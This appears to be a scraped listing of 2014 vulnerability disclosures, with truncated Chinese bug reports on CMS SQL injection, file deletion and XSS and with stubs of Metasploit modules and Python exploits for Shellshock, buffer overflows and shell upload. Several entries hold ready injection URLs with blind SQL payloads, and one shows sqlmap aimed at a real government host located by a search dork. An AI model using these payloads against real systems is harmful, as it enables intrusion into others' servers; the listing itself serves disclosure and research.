Supesite 前台二次注入一枚

简要描述： 二次猪肉。 详细说明： 在cp.php中 $ac = empty$GET'ac' ? 'profile' : trim$GET'ac'; ifinarray$ac, array'index', 'news', 'profile', 'credit', 'models' includeonceSROOT.'./source/cp'.$ac.'.php'; 包含文件进来 在source/cpnews.php中 $newsarr = array'subject' = $POST'subject', 'catid' = $POST'catid', 'type' =...

Doyo建站 SQL注入

简要描述： 由用户输入表名，未任何过滤 详细说明： 在source/pay.php下 function buymolds $this-id=$this-syArgs'id'; $this-molds=$this-syArgs'molds',1; if!$this-id&&!$this-moldsmessage"a"; $this-info=syDB$this-molds-findarray'id'=$this-id,'isshow'=1,null,'title,mgold,litpic'; if!$this-infomessage"指定购买内容不存在或未审核。";...

Supesite 注入一枚 (可提升自己为管理)

简要描述： Supesite 注入出的密码 基本都破不出来 如果能够直接提升自己为管理员 或者 自己修改管理的密码那就再好不过了。 忙里偷闲。 详细说明： 在index.php中 if$SGET'action' != 'index' ifempty$channels'menus'$SGET'action''upnameid' && $channels'menus'$SGET'action''upnameid' != 'news' $scriptfile = SROOT.'./'.$SGET'action'.'.php'; else $scriptfile =...

easytalk两枚sql盲注

简要描述： easytalk两枚sql盲注 详细说明： 1.Home\Lib\Action\SearchAction.class.php第22行代码中 $keyword=urldecodetrimhtmlspecialchars$REQUEST'keyword'; keyword参数进行了urldecode操作。绕过全局gpc的过滤，导致注入。由于字符限制导致注入较为鸡肋 http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 可输出数据...

苹果CMS sql注入一枚

简要描述： 苹果CMS sql注入一枚 详细说明： 分析参考： http://wooyun.org/bugs/wooyun-2014-066661 利用参考: http://wooyun.org/bugs/wooyun-2014-074281 这里就不做代码分析了： 访问url： http://localhost/maccms8/index.php?m=art-search-wd-x%2527%2529%253E0%2520and%2520sleep%2528if%25281%252C5%252C1%2529%2529%2523 这里 默认安装完毕后 macart表没有数据，我们插入一条...

Zoomla x2.0 /search/ShopList.aspx SQL注入漏洞

No description provided by source...

TestLink 1.9.11 - Multiple SQL Injection Vulnerabilities

No description provided by source. Vulnerability title: Multiple SQL Injection Vulnerabilities in TestLink CVE: CVE-2014-5308 Vendor: Testlink Product: TestLink Affected version: 1.9.11 Fixed version: Fixed in SVN commit number 7a09973 Reported by: Jerzy Kramarz Details: Two SQL injection...

Rejetto HttpFileServer Remote Command Execution

No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 "Rejetto HttpFileServer Remote Command Execution", 'Description' = %q Rejetto HttpFileServer HFS i...

Cmseasy存储型XSS一枚 跨后台（绕过xss防护）

简要描述： Cmseasy存储型XSS一枚（绕过xss防护）感觉这个地方管理员必中 详细说明： 在前台进行留言，当然了这个留言也可以在前台触发xss 进入后台查看 漏洞证明：...

Bacula-Web 5.2.10 (joblogs.php, jobid param) - SQL Injection

谷歌搜索：joblogs.php?jobid= 案例：http://cep.treslagoas.ms.gov.br/backup/joblogs.php?jobid=23154 D:\sqlmappython sqlmap.py -u http://cep.treslagoas.ms.gov.br/backup/joblogs.php ?jobid=23154 --dbs | | 1.0-dev-nongit-20150806 | -| . | | | .'| . | || |||||,| | || || http://sqlmap.org ! legal disclaimer:...

Wordpress Slideshow Gallery 1.4.6 - Shell Upload (Python Exploit)

No description provided by source. !/usr/bin/env python WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability CVE-2014-5460 Vulnerability discovered by: Jesus Ramirez Pichardo -...

DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities

No description provided by source. DrayTek VigorACS SI = 1.3.0 Vigor ACS-SI Edition is a Central Management System for DrayTek routers and firewalls, providing System Integrators or system administration personnel a real-time integrated monitoring, configuration and management platform...

Kolibri Webserver 2.0 Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass

No description provided by source. !/bin/python import socket, sys, re Exploit Title: Kolibri POST Buffer overflow with EMET 5.0 and EMET 4.1 Partial Bypass Date: September 30th 2014 Author: tekwizz123 Vendor Homepage: http://www.senkas.com Software Download:...

Apache mod_cgi - Remote Exploit (Shellshock)

No description provided by source. ! /usr/bin/env python from socket import from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage: print """ Shellshock apache modcgi remote exploit Usage: ./exploit.py var=value Vars: rhost: vict...

F5 iControl Remote Root Command Execution

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...

HP Network Node Manager I PMD Buffer Overflow

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp def initializeinfo =...

Wordpress InfusionSoft Plugin Upload Vulnerability

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include...

LittleSite 0.1 /index.php 任意文件下载漏洞

No description provided by source...

skywcm v3.1 /skywcm/webpage/download.jsp 任意文件下载漏洞

No description provided by source...

Asx to Mp3 2.7.5 - Stack Overflow

No description provided by source...

GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability

No description provided by source. Document Title: =============== GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1325 Release Date: ============= 2014-09-22 Vulnerability Laboratory ID VL-ID:...

Microsoft Exchange IIS HTTP Internal IP Address Disclosure

No description provided by source. Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability Google Dork: NA Date: 08/01/2014 Exploit Author: Nate Power Vendor Homepage: microsoft.com Software Link: NA Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013 Tested on: Exchan...

Moab < 7.2.9 - Authorization Bypass

No description provided by source. Moab Authentication Bypass : CVE-2014-5300 Software: Moab Affected Versions: All versions prior to Moab 7.2.9 and Moab 8 CVE Reference: CVE-2014-5300 Author: John Fitzpatrick, MWR Labs http://labs.mwrinfosecurity.com/ Severity: High Risk Vendor: Adaptive Computi...

GNU bash 4.3.11 Environment Variable dhclient Exploit

No description provided by source. !/usr/bin/python Exploit Title: dhclient shellshocker Google Dork: n/a Date: 10/1/14 Exploit Author: @0x00string Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz Version: 4.3.11 Tested on: Ubuntu 14.04.1 CVE :...

phpok配合csrf注入

简要描述： 参数未过滤 详细说明： 在projectcontrol.php function sortf $sort = $GET"sort"; if!$sort || !isarray$sort jsonexit"更新排序失败"; foreach$sort AS $key=$value $this-model'project'-updatetaxis$key,$value; jsonexit"更新排序成功",true; 可以看到系统没有通过自写函数get 而是直接用$GET接收变量 所以注入产生...

某电子政务系统sql注入第二弹，影响众多机关

简要描述： 某电子政务系统sql注入第二弹，影响众多机关 详细说明： 注入点：http://xxx/email/setting/other?boxid=1 官网上的测试：为不影响官网，本人下载了最新版在本地测试漏洞的严重性 在个人邮件菜单中：添加其他文件夹如下图 boxid参数加单引号测试： 漏洞出来了有木有： img src="https://images.seebug.org/upload/201410/02114...

苹果CMS SQL注入一枚

简要描述： 苹果CMS SQL注入一枚 详细说明： 分析参考： http://wooyun.org/bugs/wooyun-2014-066661 利用参考: http://wooyun.org/bugs/wooyun-2014-074281 这里就不做代码分析了： 访问url： http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-xxxx%2527%2529%253E0%2520or%2520sleep%2528if%25281%252C5%252C1%2529%2529%2529%2523-typeid-5.html...

YXCMS最新版绕过补丁继续任意文件删除

简要描述： YXCMS最新版绕过补丁继续任意文件删除 详细说明： 最早Matt牛在2013-12-30发的一个漏洞： WooYun: yxcms任意文件删除 导致的重新安装漏洞 厂商在2014-01-13发布了升级包，修改这个漏洞 但是处理的不严格，可以绕过，继续进行任意文件删除 看代码protected/apps/members/contoller/newscontroller.php if empty$FILES'picture''name' === false $tfile=date"Ymd"; $imgupload=...

PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution

No description provided by source. Vulnerability title: Remote Command Execution in PHPCompta/NOALYSS CVE: CVE-2014-6389 Vendor: PHPCompta Product: PHPCompta/NOALYSS Affected version: 6.7.1 5638 Fixed version: 6.7.2 Reported by: Jerzy Kramarz Details: PhpCompta 6.7.1-2 does not validate the synta...

Epicor Enterprise 7.4 - Multiple Vulnerabilities

No description provided by source. "Epicor Enterprise vulnerabilities" - Affected vendor: Epicor Software Corporation - Affected system: Epicor Enterprise - Version 7.4 - Vendor disclosure date: May 13th, 2014 - Public disclosure date: September 30th, 2014 - Status: Fixed - Associated CVEs: 1...

HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution

No description provided by source...

RBS Change Complet Open Source 3.6.8 - CSRF Vulnerability

No description provided by source. Exploit Title: RBS Change Complet Open Source CSRF Google Dork: intext:"une réalisation rbs" Date: 10/01/2014 Exploit Author: KrustyHack Vendor Homepage: http://www.rbschange.fr/ Software Link:...

CuuMall免费开源商城系统 存在邮件欺骗风险 可劫持用户名和密码

简要描述： CuuMall免费开源商城系统 header欺骗风险 可劫持用户名和密码 详细说明： 直接看代码: loginAction.class.php:161-192: public function getpassword $username = $POST'username'; $mail = $POST'email'; $us = new Model "mmember" ; $dus = $us-where "username='".$username."'" -find ; if empty $dus $this-assign "waitSecond", 3 ;...

某电子政务系统sql注入第三弹

简要描述： 某电子政务系统sql注入第三弹 详细说明： 注入点发现：加了个单引号 开始验证漏洞了：本地最新下载版本 GET /email/sent/readstatus/type/trash?id=1' HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64...

TeamSpeak Client 3.0.14 - Buffer Overflow Vulnerability

No description provided by source. Title : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability Severity : High+/Critical Reporters : SpyEye & Christian Galeone Software Version : 3.0.14 & Previous Versions Software Name : TeamSpeak Client Software Download Link :...

BMC Track-It! - Multiple Vulnerabilities

No description provided by source. Multiple critical vulnerabilities in BMC Track-It! Discovered by Pedro Ribeiro [email protected], Agile Information Security ================================================================================= The application exposes several .NET remoting services o...

All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability

No description provided by source. Document Title: =============== All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1325 Release Date: ============= 2014-09-29 Vulnerability Laboratory ID VL-I...

方维团购最新版通杀注入（附大量案例）

简要描述： RT $$$$$$$$$$$$$$$$$$$$$$$ 详细说明： 官网没成功。但是基本通杀。 存在问题的地方是这个登录接口：m.php?m=User&a=doLogin post：origURL=ghost&password=ghost&email=ghost（email参数没有过滤） 报错注入 http://www.qianrengou.com/m.php?m=User&a=doLogin post：post：origURL=ghost&password=ghost&email=ghost 默认后台：admin.php...

某电子政务系统sql注入，影响众多机关

简要描述： 某电子政务系统sql注入，影响众多机关 竟然被360忽略，好呆也是大洞啊。。。。还是乌云好。。。。 官网列出的典型案例： 广东省佛山监狱协 中共国家税务总局党校 433809部队 北京市经信委 北京市人民对外友好协会 北京市人民政府港澳事务办公室 北京市外事综合服务大厅 东莞市第二人民法院 东莞市第一人民法院 大兴区政府 广西梧州市国家税务局信息中心 国家密码局 河南省人口与计划生育委员 国务院研发中心 江苏省武进区人民政府 人民日报社 深圳市龙岗区住房和建设局 深圳市环境工程科学技术中心有限公司 浙江省衢州市柯城区教育体育文化局 邢台市纪委 详细说明：...

Linux Kernel remount FUSE Exploit

No description provided by source. / FUSE-based exploit for CVE-2014-5207 Copyright c 2014 Andy Lutomirski Based on code that is: Copyright C 2001-2007 Miklos Szeredi [email protected] This program can be distributed under the terms of the GNU GPL. See the file COPYING. gcc -Wall fusesuid.c...

Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037)

No description provided by source. !-- Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass Exploit Coded by sickness || EMET 5.0 bypass by ryujin http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ ‎ Affected Software: Internet Explorer 8 Vulnerability: Fixed Col...

YXcms最新版任意文件删除漏洞

简要描述： YXcms最新版可以删除任意文件 详细说明： 问题文件： \YXcms1.2.4\protected\apps\member\controller\inforController.php public function index if!$this-isPost $auth=$this-auth; $id=$auth'id'; $info=model'members'-find"id='$id'"; $this-info=$info; $this-path=ROOT.'https://images.seebug.org/upload/member/image/';...

ManageEngine OpManager / Social IT Arbitrary File Upload

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include...

OpenFiler 2.99.1 - CSRF Vulnerability

No description provided by source. !-- Exploit Title: DoS via CSRF in openfiler Exploit author: Dolev Farhi @dolevff Date 07/05/2014 Vendor homepage: http://www.openfiler.com Affected Software version: 2.99.1 Alerted vendor: 7.5.14 CVE: N/A Software Description ===================== Openfiler is ...

Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities

No description provided by source. Ultra Electronics / AEP Networks - SSL VPN Netilla / Series A / Ultra Protect Vulnerabilities http://www.osisecurity.com.au/advisories/ultra-aep-netilla-vulnerabilities Release Date: 02-Oct-2014 Software: Ultra Electronics - Series A...

Postfix SMTP - Shellshock Exploit

No description provided by source. !/bin/python Exploit Title: Shellshock SMTP Exploit Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/ Version: 4.2.x 4.2.48 Tested on: Debian 7 postfix smtp server w/procmail CVE : 2014-6271 from...

FRHRCMS V3.0 /person/person_certificate.php 任意文件删除漏洞

No description provided by source...

Bash - CGI RCE (MSF) Shellshock Exploit

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include...

IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit

No description provided by source. !/usr/bin/env python Exploit Title : IPFire = 2.15 core 82 Authenticated cgi Remote Command Injection ShellShock Exploit Author : Claudio Viviani Vendor Homepage : http://www.ipfire.org Software Link:...

Pure-FTPd External Authentication Bash Environment Variable Code Injection

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit4 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include...